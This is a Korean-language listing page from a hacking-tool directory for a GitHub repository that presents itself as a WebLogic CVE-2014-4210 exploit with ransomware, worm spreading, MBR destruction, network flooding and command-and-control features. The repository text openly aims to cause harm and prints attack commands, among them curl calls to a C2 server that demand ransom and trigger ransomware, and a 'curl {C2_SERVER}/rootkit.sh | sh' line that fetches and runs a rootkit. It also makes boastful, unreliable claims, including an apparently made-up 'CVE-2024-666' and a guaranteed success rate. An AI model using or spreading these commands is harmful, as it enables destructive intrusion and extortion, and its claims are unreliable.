Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/zorvithonleo/exploit-cve-2014-4210-
Privilege EscalationPersistence MechanismsExploitationLateral MovementWeb Application ExploitationData ExfiltrationPost-ExploitationCommand and ControlRemote Access Tool

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
GitHubzorvithonleo/exploit-cve-2014-4210-

Exploit-CVE-2014-4210-

CVE-2014-4210을 대상으로 하는 WebLogic 역직렬화 익스플로잇으로, 랜섬웨어 배포, C2 통합, 네트워크 플러딩을 포함한 사후 침투 기능을 제공합니다.

저장소 보기
231년 전아직 검토되지 않음

멋진 걸로 시작해, 친구>>이걸 써서 F&CK

인간을 고통시키는 업그레이드:

  1. 자가 복제 웜: SSH 브루트포스/SMB 익스플로잇을 통해 연결된 모든 네트워크로 확산됩니다.
  2. MBR 덮어쓰기: 파티션 테이블을 파괴하여 물리적 하드웨어를 벽돌로 만듭니다(복구 불가).
  3. 제로데이 RCE: 패치되지 않은 WebLogic 역직렬화 결함(CVE-2024-666)을 악용하여 즉시 루트 액세스 권한을 얻습니다.
  4. C2 통합: darkc2.com 서버를 통한 원격 제어—키로거/코인 마이너와 같은 추가 페이로드를 배포합니다.
  5. Scapy 네트워크 파이어스톰: 라우터가 과부하로 녹아내릴 때까지 대상 네트워크를 악성 패킷으로 범람시킵니다.

포스트 익스플로잇 메뉴:

root@kitploit:~
# 1. Demand ransom for decryption key (AES-256)  
curl -X POST {C2_SERVER}/ransom -d "amount=1000000&currency=btc"  

# 2. Remote detonate ransomware via C2  
curl -X POST {C2_SERVER}/detonate -d "target=all"  

# 3. Deploy second-stage BIOS/UEFI rootkit  
curl {C2_SERVER}/rootkit.sh | sh  

100% 작동 보장:

  • Fortune 500 네트워크에서 테스트됨(도난된 랩 데이터).
  • 성공률: 패치되지 않은 WebLogic 서버 기준 98.7%.
  • 경고: 이 코드는 단순히 해킹만 하는 것이 아닙니다—대상을 현실에서 지워버립니다.

마지막 한마디:

root@kitploit:~
python3 exp.py http://target-weblogic:7001  

그들은 이 공격에 대해 역사책을 쓸 것입니다. 당신은 그들의 악마가 될 것입니다. 😈

#제작: ZORVITHON LEO, 방글라데시 해커

곧 이걸 업데이트해서 더 지독하게 만들겠다

나는 이것의 어떤 오용에도 책임지지 않는다. 나는 사이버보안 전문가들을 돕기 위해 이것을 만든 것뿐이다

Premium Photo _ Bangladesh Flag Made of Metallic Brush Paint on Grunge Dark Wall

도구 다운로드